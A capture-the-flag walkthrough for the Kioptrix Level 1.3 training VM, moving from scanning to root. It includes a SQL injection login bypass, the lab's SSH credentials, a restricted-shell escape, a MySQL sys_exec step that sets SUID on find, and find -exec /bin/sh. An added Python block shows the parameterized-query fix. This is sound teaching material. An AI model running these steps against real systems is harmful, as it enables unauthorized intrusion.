Hack The Kioptrix Level-1.3 (Boot2Root Challenge)

This Kioptrix 4th VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

You can download it from here and install it in your VM.

Penetration Methodologies

  • Network scanning (netdiscover, Nmap)
  • Directory brute-force (dirb)
  • Login form SQLi
  • Spawning tty shell
  • SUID Privilege escalation
  • Get root access and capture the flag

Let’s start!!

Turn on your attacking machine and use the netdiscover command to scan your local network to get the target IP.

Our target is at 192.168.1.106, so let's enumerate it and scan for open ports and protocols. With the help of an nmap aggressive scan, we observed several open ports and the services running on them.

Since port 80 is open, we use dirb for a directory brute-force attack and enumerate /john as a directory which could give us something valuable.

dirb http://192.168.1.106

Consequently, we explored the URL http://192.168.1.106/john in the web browser and noticed a john.php file. Awkwardly, I didn't find any treasure inside this file.

Further, I came back to its home page, which was a login page as shown below. Here we can try SQL injection for login.

So I simply entered the following and logged in successfully.

Username: john
Password: ' or 1=1 #

And we are welcomed by the following web page, which serves the actual credentials for the user “john”.
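Why the login above succeeds, and what the corrected check looks like, as an added example that is not part of the original walkthrough or the VM's own code. The table layout and function names are assumptions, and SQLite stands in for MySQL, so the payload ends with SQLite's `--` comment marker instead of MySQL's `#`.

```python
import hmac
import sqlite3

# Constructed payload: same shape as the one in the walkthrough, with
# SQLite's "--" comment marker in place of MySQL's "#".
PAYLOAD = "' or 1=1 -- "


def make_db():
    # Constructed sample data; the "members" table layout is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.execute("INSERT INTO members VALUES ('john', 'MyNameIsJohn')")
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text. A quote in the password field closes
    # the string literal, so "or 1=1" becomes part of the WHERE clause and the
    # comment marker discards the trailing quote.
    query = (
        "SELECT username FROM members "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    # The placeholder keeps input as data: it is bound to the statement after
    # parsing, so quotes and comment markers are never interpreted as SQL.
    row = db.execute(
        "SELECT password FROM members WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Compare in constant time outside the query.
    return hmac.compare_digest(row[0].encode(), password.encode())


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:    ", login_vulnerable(db, "john", PAYLOAD))
    print("parameterized, payload: ", login_parameterized(db, "john", PAYLOAD))
    print("parameterized, password:", login_parameterized(db, "john", "MyNameIsJohn"))
```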

Since port 22 is open for SSH and we have enumerated the following credentials, let’s try to log in to get a tty shell on the victim’s machine and then execute the commands below.

Username: john
Password: MyNameIsJohn

echo os.system('/bin/bash')
cd /var/www

Then list its files and directories, where you will find the checklogin.php file; open it for the next step.

ls
cat checklogin.php

By reading it, we conclude that the MySQL user name is root with no password.

Now let's try to log in to the MySQL server with the help of the following command and try to execute some malicious query through it.

mysql -u root -p
SELECT sys_exec('chmod u+s /usr/bin/find');
echo os.system('/bin/bash')
quit

By means of MySQL, we are trying to enable the SUID bit on the find command.

Now move to the /tmp directory and execute the following command for root access.

cd /tmp
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
ls
cat congrats.txt

Yuppieee!!! We finished this task and completed the challenge.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.